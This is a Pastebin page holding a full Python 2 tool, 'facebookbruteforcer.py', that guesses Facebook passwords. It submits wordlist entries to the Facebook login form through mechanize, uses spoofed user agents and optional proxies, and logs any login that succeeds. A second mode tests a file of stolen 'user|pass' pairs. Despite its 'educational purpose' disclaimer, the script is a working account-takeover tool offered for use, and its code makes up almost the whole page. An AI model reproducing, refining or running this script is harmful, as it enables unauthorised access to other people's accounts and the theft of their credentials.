Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # This is facebook bruteforcer tools
- # This was written for educational purpose and pentest only. Use it at your own risk.
- # Author will not be responsible for any damage !!
- # Toolname : facebookbruteforcer.py
- # Programmer : Siscovic Zakaria & Silver Wolf
- # Version : 3.1
- # Date : Tuesday Jun 03 2014 09:13:2014
- import re
- import os
- import sys
- import random
- import warnings
- import time
- try:
- import mechanize
- except ImportError:
- print "[*] Please install mechanize python module first"
- sys.exit(1)
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- sys.exit(1)
- try:
- import cookielib
- except ImportError:
- print "[*] Please install cookielib python module first"
- sys.exit(1)
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- sys.exit(1)
- warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
- # define variable
- __programmer__ = "Siscovic Zakaria & Silver Wolf"
- __version__ = "3.1"
- accfile = ""
- checker = False
- verbose = False
- useproxy = False
- usepassproxy = False
- log = 'fbbruteforcer.log'
- file = open(log, "a")
- success = 'facebook.com/settings'
- fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
- # some cheating ..
- ouruseragent = ['Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0' ]
- facebook = '''
- __ _ _
- / _| | | | |
- | |_ __ _ ___ ___| |__ ___ ___ | | __
- | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
- | || (_| | (_| __/ |_) | (_) | (_) | <
- |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
- Brute Force By Siscovic
- Modified By SilverWolf <SilverWolf@ceh.vn>
- Programmer : %s
- Version : %s''' % (__programmer__, __version__)
- option = '''
- Usage : %s [options]
- Option : -u, --username <username> | User for bruteforcing
- -w, --wordlist <filename> | Wordlist used for bruteforcing
- -f, --full <filename> | Check accounts in file
- -v, --verbose | Set %s will be verbose
- -p, --proxy <host:port> | Set http proxy will be use
- -k, --usernameproxy <username> | Set username at proxy will be use
- -i, --passproxy <password> | Set password at proxy will be use
- -l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
- -h, --help <help> | Print this help
- Example : %s -u Zakaria-Siscovic@hotmail.fr -w wordlist.txt"
- P.S : add "&" to run in the background
- ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
- hme = '''
- Usage : %s [option]
- -h or --help for get help
- ''' % sys.argv[0]
- def helpme():
- print facebook
- print option
- file.write(facebook)
- file.write(option)
- sys.exit(1)
- def helpmee():
- print facebook
- print hme
- file.write(facebook)
- file.write(hme)
- sys.exit(1)
- for arg in sys.argv:
- try:
- if arg.lower() == '-u' or arg.lower() == '--user':
- username = sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower() == '-w' or arg.lower() == '--wordlist':
- wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower() == '-l' or arg.lower() == '--log':
- log = sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower() == '-p' or arg.lower() == '--proxy':
- useproxy = True
- proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower() == '-k' or arg.lower() == '--userproxy':
- usepassproxy = True
- usw = sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower() == '-i' or arg.lower() == '--passproxy':
- usepassproxy = True
- usp = sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower() == '-v' or arg.lower() == '--verbose':
- verbose = True
- elif arg.lower() == '-h' or arg.lower() == '--help':
- helpme()
- elif arg.lower() == '-f' or arg.lower() == '--full':
- accfile = sys.argv[int(sys.argv[1:].index(arg))+2]
- checker = True
- elif len(sys.argv) <= 1:
- helpmee()
- except IOError:
- helpme()
- except NameError:
- helpme()
- except IndexError:
- helpme()
- def accountchecker(fbid,fbpass):
- ## Need create browser object again
- global br
- try:
- br = mechanize.Browser()
- cj = cookielib.LWPCookieJar()
- br.set_cookiejar(cj)
- br.set_handle_equiv(True)
- br.set_handle_gzip(True)
- br.set_handle_redirect(True)
- br.set_handle_referer(True)
- br.set_handle_robots(False)
- br.set_debug_http(False)
- br.set_debug_redirects(False)
- br.set_debug_redirects(False)
- br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
- if useproxy:
- br.set_proxies({"http": proxy})
- if usepassproxy:
- br.add_proxy_password(usw, usp)
- if verbose:
- br.set_debug_http(True)
- br.set_debug_redirects(True)
- br.set_debug_redirects(True)
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- file.write("\n[*] Exiting program...\n")
- sys.exit(1)
- ## Scanning
- try:
- print "\r[*] Trying %s... " % (fbid + " | " + fbpass)
- file.write("[*] Trying %s\n" % fbid + fbpass)
- sys.stdout.flush()
- br.addheaders = [('User-agent', random.choice(ouruseragent))]
- opensite = br.open(fblogin)
- br.select_form(nr=0)
- br.form['email'] = fbid
- br.form['pass'] = fbpass
- br.submit()
- response = br.response().read()
- if verbose:
- print response
- if not success in response:
- print "--> Pass: " + (fbid + " | " + fbpass)
- file.write("\n--> Pass: " + (fbid + " | " + fbpass))
- else:
- print "--> Failed"
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- sys.exit(1)
- except mechanize._mechanize.FormNotFoundError:
- print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
- file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
- except mechanize._form.ControlNotFoundError:
- print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
- file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
- def bruteforce(word):
- try:
- sys.stdout.write("\r[*] Trying %s... " % word)
- file.write("[*] Trying %s\n" % word)
- sys.stdout.flush()
- br.addheaders = [('User-agent', random.choice(ouruseragent))]
- opensite = br.open(fblogin)
- br.select_form(nr=0)
- br.form['email'] = username
- br.form['pass'] = word
- br.submit()
- response = br.response().read()
- if verbose:
- f = open(word + ".txt", 'w')
- #print response
- f.write(response)
- if success in response:
- print "\n\n[*] Logging in success..."
- print "[*] Username : %s" % (username)
- print "[*] Password : %s\n" % (word)
- file.write("\n[*] Logging in success...")
- file.write("\n[*] Username : %s" % (username))
- file.write("\n[*] Password : %s\n\n" % (word))
- sys.exit(1)
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- sys.exit(1)
- except mechanize._mechanize.FormNotFoundError:
- print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
- file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
- sys.exit(1)
- except mechanize._form.ControlNotFoundError:
- print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
- file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
- sys.exit(1)
- def releaser():
- global word,checker,accfile
- if not checker:
- for word in words:
- bruteforce(word.replace("\n",""))
- else:
- f = open(accfile, 'r')
- for line in f:
- l1 = line.replace("\n","")
- accdic = l1.split("|")
- #print accdic[0]
- #try:
- accountchecker(accdic[0],accdic[1])
- #except:
- # print "Split error: " + l1
- def main():
- global br
- global words
- try:
- br = mechanize.Browser()
- cj = cookielib.LWPCookieJar()
- br.set_cookiejar(cj)
- br.set_handle_equiv(True)
- br.set_handle_gzip(True)
- br.set_handle_redirect(True)
- br.set_handle_referer(True)
- br.set_handle_robots(False)
- br.set_debug_http(False)
- br.set_debug_redirects(False)
- br.set_debug_redirects(False)
- br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
- if useproxy:
- br.set_proxies({"http": proxy})
- if usepassproxy:
- br.add_proxy_password(usw, usp)
- if verbose:
- br.set_debug_http(True)
- br.set_debug_redirects(True)
- br.set_debug_redirects(True)
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- file.write("\n[*] Exiting program...\n")
- sys.exit(1)
- if not checker:
- try:
- preventstrokes = open(wordlist, "r")
- words = preventstrokes.readlines()
- count = 0
- while count < len(words):
- words[count] = words[count].strip()
- count += 1
- except IOError:
- print "\n[*] Error: Check your wordlist path\n"
- file.write("\n[*] Error: Check your wordlist path\n")
- sys.exit(1)
- except NameError:
- helpme()
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- file.write("\n[*] Exiting program...\n")
- sys.exit(1)
- try:
- print facebook
- print "\n[*] Starting attack at %s" % time.strftime("%X")
- print "[*] Account for bruteforcing %s" % (username)
- print "[*] Loaded :",len(words),"words"
- print "[*] Bruteforcing, please wait..."
- file.write(facebook)
- file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
- file.write("\n[*] Account for bruteforcing %s" % (username))
- file.write("\n[*] Loaded : %d words" % int(len(words)))
- file.write("\n[*] Bruteforcing, please wait...\n")
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- sys.exit(1)
- try:
- releaser()
- bruteforce(word)
- except NameError:
- helpme()
- else:
- try:
- print facebook
- print "\n[*] Starting attack at %s" % time.strftime("%X")
- print "[*] Bruteforcing, please wait..."
- file.write(facebook)
- file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
- file.write("\n[*] Bruteforcing, please wait...\n")
- except KeyboardInterrupt:
- print "\n[*] Exiting program...\n"
- sys.exit(1)
- try:
- releaser()
- #bruteforce(word)
- except NameError:
- helpme()
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement